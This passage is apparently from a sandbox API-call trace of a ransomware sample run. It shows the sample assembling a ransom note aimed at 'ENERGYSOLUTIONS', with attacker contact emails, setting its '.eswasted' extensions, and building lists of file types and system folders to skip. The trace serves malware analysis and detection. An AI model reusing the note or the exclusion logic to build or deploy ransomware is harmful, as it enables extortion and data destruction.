(lpString="share") returned 5 [0068.969] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4bc5a8 | out: hHeap=0x4a0000) returned 1 [0068.969] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x8) returned 0x4bcba0 [0068.969] StrToIntExW (in: pszString="128", dwFlags=0x0, piRet=0x111ff60 | out: piRet=0x111ff60) returned 1 [0068.969] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4bcba0 | out: hHeap=0x4a0000) returned 1 [0068.969] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x6) returned 0x4bcba0 [0068.969] StrToIntExW (in: pszString="20", dwFlags=0x0, piRet=0x111ff64 | out: piRet=0x111ff64) returned 1 [0068.969] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4bcba0 | out: hHeap=0x4a0000) returned 1 [0068.969] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x406) returned 0x4c3aa0 [0068.969] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x120) returned 0x4c3eb0 [0068.969] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2c) returned 0x4bc5a8 [0068.969] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x4c3eb0, cbMultiByte=288, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 288 [0068.969] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x242) returned 0x4c3fd8 [0068.969] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x4c3eb0, cbMultiByte=288, lpWideCharStr=0x4c3fd8, cchWideChar=288 | out: lpWideCharStr="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]*[end_key]\r\nKEEP IT\r\n") returned 288 [0068.969] lstrlenW (lpString="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]*[end_key]\r\nKEEP IT\r\n") returned 286 [0068.969] StrChrW (lpStart="[begin_key]*[end_key]", wMatch=0x2a) returned="*[end_key]" [0068.970] StrStrW (lpFirst="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]*[end_key]\r\nKEEP IT\r\n", lpSrch="[begin_key]*[end_key]") returned="[begin_key]*[end_key]\r\nKEEP IT\r\n" [0068.970] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x242) returned 0x4c4228 [0068.970] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4c3fd8 | out: hHeap=0x4a0000) returned 1 [0068.970] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x4) returned 0x4bcba0 [0068.970] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x8) returned 0x4c3fd8 [0068.970] StrToIntExW (in: pszString="200", dwFlags=0x0, piRet=0x111ff68 | out: piRet=0x111ff68) returned 1 [0068.970] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4c3fd8 | out: hHeap=0x4a0000) returned 1 [0068.970] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1e) returned 0x4bdf78 [0068.970] ExpandEnvironmentStringsW (in: lpSrc="%temp%\\lck.log", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x18 [0068.970] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x30) returned 0x4c3fd8 [0068.970] ExpandEnvironmentStringsW (in: lpSrc="%temp%\\lck.log", lpDst=0x4c3fd8, nSize=0x18 | out: lpDst="C:\\Windows\\TEMP\\lck.log") returned 0x18 [0068.970] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4bdf78 | out: hHeap=0x4a0000) returned 1 [0068.970] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x290) returned 0x4c4478 [0068.970] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xb8) returned 0x4c4010 [0068.970] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x150) returned 0x4c40d0 [0068.970] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xe) returned 0x4bc780 [0068.970] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x6) returned 0x4c4710 [0068.970] StrToIntExW (in: pszString="50", dwFlags=0x0, piRet=0x111fec0 | out: piRet=0x111fec0) returned 1 [0068.970] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4c4710 | out: hHeap=0x4a0000) returned 1 [0068.970] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x6) returned 0x4c4710 [0068.970] StrToIntExW (in: pszString="32", dwFlags=0x0, piRet=0x111ff3c | out: piRet=0x111ff3c) returned 1 [0068.970] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4c4710 | out: hHeap=0x4a0000) returned 1 [0069.070] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x111fe8c | out: ppstm=0x111fe8c*=0x4bdf78) returned 0x0 [0069.071] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.071] lstrlenW (lpString=".eswasted_info") returned 14 [0069.071] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x4bdf50*=0x2e, cb=0x1c, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.071] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.071] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.071] lstrlenW (lpString=".eswasted") returned 9 [0069.071] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x4ba0e0*=0x2e, cb=0x12, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.071] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.071] lstrlenW (lpString="*\\NTLDR|*\\BOOTMGR|*\\GRLDR|*.386|*.ps1|*.msu|*.ani|*.wpx|*.hlp|*.ocx|*.com|*.cpl|*.adv|*.cmd|*.lnk|*.drv|*.sys|*.icl|*.nls|*.cab|*.bat|*.theme|*.bin|*.key|*.themepack|*.msi|*.icns|*.ics|*.idx|*.hta|*.scr|*.msstyles|*.diagcfg|*.diagcab|*.nomedia|*.msc|*.cur|*.mod|*.shs|*.rtp|*.rom|*.msp|*.ini|*.bak|*.dat|*.sdi|*.wim|*.dll|*.exe") returned 327 [0069.071] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x4c4478*=0x2a, cb=0x28e, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.071] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.071] StrChrW (lpStart="%ProgramData%|%windir%|%temp%|%AppData%|C:\\Recovery|C:\\Program Files|C:\\Program Files (x86)", wMatch=0x7c) returned="|%windir%|%temp%|%AppData%|C:\\Recovery|C:\\Program Files|C:\\Program Files (x86)" [0069.071] ExpandEnvironmentStringsW (in: lpSrc="%ProgramData%", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0xf [0069.071] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1e) returned 0x4bdff0 [0069.071] ExpandEnvironmentStringsW (in: lpSrc="%ProgramData%", lpDst=0x4bdff0, nSize=0xf | out: lpDst="C:\\ProgramData") returned 0xf [0069.071] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x4bdff0*=0x43, cb=0x1c, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.071] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4bdff0 | out: hHeap=0x4a0000) returned 1 [0069.071] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.071] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.071] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.071] StrChrW (lpStart="%windir%|%temp%|%AppData%|C:\\Recovery|C:\\Program Files|C:\\Program Files (x86)", wMatch=0x7c) returned="|%temp%|%AppData%|C:\\Recovery|C:\\Program Files|C:\\Program Files (x86)" [0069.072] ExpandEnvironmentStringsW (in: lpSrc="%windir%", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0xb [0069.072] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x16) returned 0x4ba100 [0069.072] ExpandEnvironmentStringsW (in: lpSrc="%windir%", lpDst=0x4ba100, nSize=0xb | out: lpDst="C:\\Windows") returned 0xb [0069.072] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x4ba100*=0x43, cb=0x14, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.072] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ba100 | out: hHeap=0x4a0000) returned 1 [0069.072] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.072] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.072] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.072] StrChrW (lpStart="%temp%|%AppData%|C:\\Recovery|C:\\Program Files|C:\\Program Files (x86)", wMatch=0x7c) returned="|%AppData%|C:\\Recovery|C:\\Program Files|C:\\Program Files (x86)" [0069.072] ExpandEnvironmentStringsW (in: lpSrc="%temp%", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x10 [0069.072] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x20) returned 0x4bdff0 [0069.072] ExpandEnvironmentStringsW (in: lpSrc="%temp%", lpDst=0x4bdff0, nSize=0x10 | out: lpDst="C:\\Windows\\TEMP") returned 0x10 [0069.072] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x4bdff0*=0x43, cb=0x1e, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.072] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4bdff0 | out: hHeap=0x4a0000) returned 1 [0069.072] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.072] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.072] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.072] StrChrW (lpStart="%AppData%|C:\\Recovery|C:\\Program Files|C:\\Program Files (x86)", wMatch=0x7c) returned="|C:\\Recovery|C:\\Program Files|C:\\Program Files (x86)" [0069.072] ExpandEnvironmentStringsW (in: lpSrc="%AppData%", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x39 [0069.072] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x72) returned 0x4b0e08 [0069.072] ExpandEnvironmentStringsW (in: lpSrc="%AppData%", lpDst=0x4b0e08, nSize=0x39 | out: lpDst="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming") returned 0x39 [0069.072] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x4b0e08*=0x43, cb=0x70, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.072] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b0e08 | out: hHeap=0x4a0000) returned 1 [0069.072] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.072] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.072] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.072] StrChrW (lpStart="C:\\Recovery|C:\\Program Files|C:\\Program Files (x86)", wMatch=0x7c) returned="|C:\\Program Files|C:\\Program Files (x86)" [0069.072] ExpandEnvironmentStringsW (in: lpSrc="C:\\Recovery", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0xc [0069.072] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x18) returned 0x4ba100 [0069.072] ExpandEnvironmentStringsW (in: lpSrc="C:\\Recovery", lpDst=0x4ba100, nSize=0xc | out: lpDst="C:\\Recovery") returned 0xc [0069.072] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x4ba100*=0x43, cb=0x16, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.072] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ba100 | out: hHeap=0x4a0000) returned 1 [0069.072] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.073] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.073] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.073] StrChrW (lpStart="C:\\Program Files|C:\\Program Files (x86)", wMatch=0x7c) returned="|C:\\Program Files (x86)" [0069.073] ExpandEnvironmentStringsW (in: lpSrc="C:\\Program Files", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x11 [0069.073] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x22) returned 0x4c4b00 [0069.073] ExpandEnvironmentStringsW (in: lpSrc="C:\\Program Files", lpDst=0x4c4b00, nSize=0x11 | out: lpDst="C:\\Program Files") returned 0x11 [0069.073] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x4c4b00*=0x43, cb=0x20, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.073] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4c4b00 | out: hHeap=0x4a0000) returned 1 [0069.073] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.073] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.073] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.073] StrChrW (lpStart="C:\\Program Files (x86)", wMatch=0x7c) returned 0x0 [0069.073] ExpandEnvironmentStringsW (in: lpSrc="C:\\Program Files (x86)", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x17 [0069.073] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2e) returned 0x4c4f20 [0069.073] ExpandEnvironmentStringsW (in: lpSrc="C:\\Program Files (x86)", lpDst=0x4c4f20, nSize=0x17 | out: lpDst="C:\\Program Files (x86)") returned 0x17 [0069.073] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x4c4f20*=0x43, cb=0x2c, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.074] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4c4f20 | out: hHeap=0x4a0000) returned 1 [0069.074] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.074] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.074] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.074] StrChrW (lpStart="bin|Boot|boot|dev|etc|lib|initdr|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|Boot|boot|dev|etc|lib|initdr|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0069.074] lstrlenW (lpString="bin") returned 3 [0069.074] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.074] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.074] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x4c40d0*=0x62, cb=0x6, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.074] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.074] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.074] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.074] StrChrW (lpStart="Boot|boot|dev|etc|lib|initdr|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|boot|dev|etc|lib|initdr|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0069.074] lstrlenW (lpString="Boot") returned 4 [0069.074] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.074] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.074] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x4c40d8*=0x42, cb=0x8, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.074] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.074] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.074] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.074] StrChrW (lpStart="boot|dev|etc|lib|initdr|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|dev|etc|lib|initdr|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0069.074] lstrlenW (lpString="boot") returned 4 [0069.074] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.074] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.074] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x4c40e2*=0x62, cb=0x8, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.074] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.074] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.074] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.074] StrChrW (lpStart="dev|etc|lib|initdr|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|etc|lib|initdr|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0069.074] lstrlenW (lpString="dev") returned 3 [0069.074] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.074] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.074] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x4c40ec*=0x64, cb=0x6, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.074] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.075] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.075] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.075] StrChrW (lpStart="etc|lib|initdr|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|lib|initdr|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0069.075] lstrlenW (lpString="etc") returned 3 [0069.075] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.075] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.075] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x4c40f4*=0x65, cb=0x6, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.075] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.075] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.075] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.075] StrChrW (lpStart="lib|initdr|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|initdr|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0069.075] lstrlenW (lpString="lib") returned 3 [0069.075] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.075] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.075] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x4c40fc*=0x6c, cb=0x6, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.075] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.075] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.075] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.075] StrChrW (lpStart="initdr|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0069.075] lstrlenW (lpString="initdr") returned 6 [0069.075] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.075] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.075] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x4c4104*=0x69, cb=0xc, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.075] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.075] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.075] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.075] StrChrW (lpStart="sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0069.075] lstrlenW 